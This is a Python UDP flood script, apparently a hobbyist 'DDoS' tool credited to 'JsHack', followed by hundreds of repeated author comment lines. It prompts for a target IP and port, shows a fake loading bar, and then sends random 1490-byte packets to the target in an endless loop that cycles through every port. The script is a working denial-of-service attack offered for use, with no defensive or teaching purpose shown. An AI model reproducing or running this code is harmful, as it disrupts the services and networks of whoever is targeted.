import sys
import os
import time
import socket
import random
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
#+++
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
#############
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
#############
#+
os.system("clear")
print (YELLOW+"")
os.system("figlet JsH4cK")

print
ip = raw_input(RED+"""
 
IP     : """)
port = input(YELLOW+"""

Port  : """)

#JsH4cK

os.system("clear")
os.system("figlet DDoS")
print (RED+"[                    ] 0% ")
time.sleep(1)
print (RED+"[=====               ] 25%")
time.sleep(1)
print (RED+"[==========          ] 50%")
time.sleep(1)
print (RED+"[===============     ] 75%")
time.sleep(1)
print (RED+"[====================] 100%")
time.sleep(1)
print (BLUE+"""

--------------------------------------

Autor: JsHack

--------------------------------------

--------------------------------------

GitHub: https://github.com/jsh4ck

--------------------------------------


-------------------------------------------

YouTube: https://www.youtube.com/c/JsHack

-------------------------------------------""")
time.sleep(5)

print (RED+"")
#JsHack
os.system ("""

figlet Cargando""")
time.sleep(10)

sent = 0
while True:
     sock.sendto(bytes, (ip,port))
     sent = sent + 1
     port = port + 1
     print (YELLOW+"Enviando %s Paquetes A %s port:%s")%(sent,ip,port)
     if port == 65534:
       port = 1






























#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack

#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack

#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
#Autor: JsHack
